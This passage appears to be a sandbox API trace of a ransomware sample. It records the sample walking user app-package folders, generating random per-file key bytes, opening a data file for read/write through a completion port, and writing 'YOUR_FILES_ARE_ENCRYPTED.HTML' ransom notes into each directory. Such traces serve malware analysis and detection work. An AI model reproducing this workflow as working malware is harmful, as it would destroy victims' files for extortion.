lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe" [0120.633] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\*" [0120.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc70cdea, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc70cdea, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc70cdea, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.634] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc70cdea, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc70cdea, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc70cdea, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.634] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc70cdea, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc70cdea, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xd0966aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.634] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.634] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 175 [0120.634] GetProcessHeap () returned 0x600000 [0120.634] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.635] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore" [0120.635] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0120.635] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc70cdea, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc70cdea, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xd0966aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0120.636] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc70cdea, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc70cdea, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xd0966aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.636] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc70cdea, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xd5cd6aa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xd5cd6aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.636] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.636] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 195 [0120.636] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.636] lstrlenW (lpString=".dat") returned 4 [0120.636] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.636] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\microsoft.windowssoundrecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0120.639] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=32768) returned 1 [0120.639] GetProcessHeap () returned 0x600000 [0120.639] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.642] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="76") returned 2 [0120.642] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="FA") returned 2 [0120.642] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="96") returned 2 [0120.642] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="20") returned 2 [0120.642] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="6B") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="20") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="7E") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="19") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="D9") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="DA") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="B1") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="CB") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="21") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="F8") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="F8") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="42") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="7B") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="84") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="32") returned 2 [0120.642] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="5C") returned 2 [0120.642] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="EB") returned 2 [0120.642] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="9A") returned 2 [0120.643] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="8D") returned 2 [0120.643] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="05") returned 2 [0120.643] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="AB") returned 2 [0120.643] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="A4") returned 2 [0120.643] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="3B") returned 2 [0120.643] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="84") returned 2 [0120.643] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="D4") returned 2 [0120.643] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="75") returned 2 [0120.643] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="73") returned 2 [0120.643] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="60") returned 2 [0120.643] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0120.643] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.643] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.643] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc7cba4d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc7cba4d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc7cba4d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.643] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.643] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 200 [0120.643] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.643] lstrlenW (lpString=".LOG1") returned 5 [0120.644] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.644] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc7cba4d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc7cba4d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc7cba4d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.644] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.644] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 200 [0120.648] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.648] lstrlenW (lpString=".LOG2") returned 5 [0120.649] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.649] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc7cba4d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc7cba4d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc7cba4d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.649] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0120.649] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 205 [0120.649] GetProcessHeap () returned 0x600000 [0120.649] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\microsoft.windowssoundrecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.651] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.652] CloseHandle (hObject=0x324) returned 1 [0120.652] GetProcessHeap () returned 0x600000 [0120.652] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.652] GetProcessHeap () returned 0x600000 [0120.652] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.652] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc70cdea, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc70cdea, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xd0966aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.652] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.652] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 189 [0120.652] GetProcessHeap () returned 0x600000 [0120.652] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Microsoft.WindowsSoundRecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\microsoft.windowssoundrecorder_10.1510.12110.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.654] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.655] CloseHandle (hObject=0x320) returned 1 [0120.655] GetProcessHeap () returned 0x600000 [0120.655] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.655] GetProcessHeap () returned 0x600000 [0120.655] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.658] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0120.658] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.658] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState") returned 106 [0120.658] GetProcessHeap () returned 0x600000 [0120.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.658] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState" [0120.658] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\*" [0120.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.659] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.659] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.659] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.659] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0120.659] GetProcessHeap () returned 0x600000 [0120.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.660] WriteFile (in: hFile=0x320, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.661] CloseHandle (hObject=0x320) returned 1 [0120.661] GetProcessHeap () returned 0x600000 [0120.661] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.661] GetProcessHeap () returned 0x600000 [0120.661] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.661] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0583b1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0120.661] StrStrIW (lpFirst="Settings", 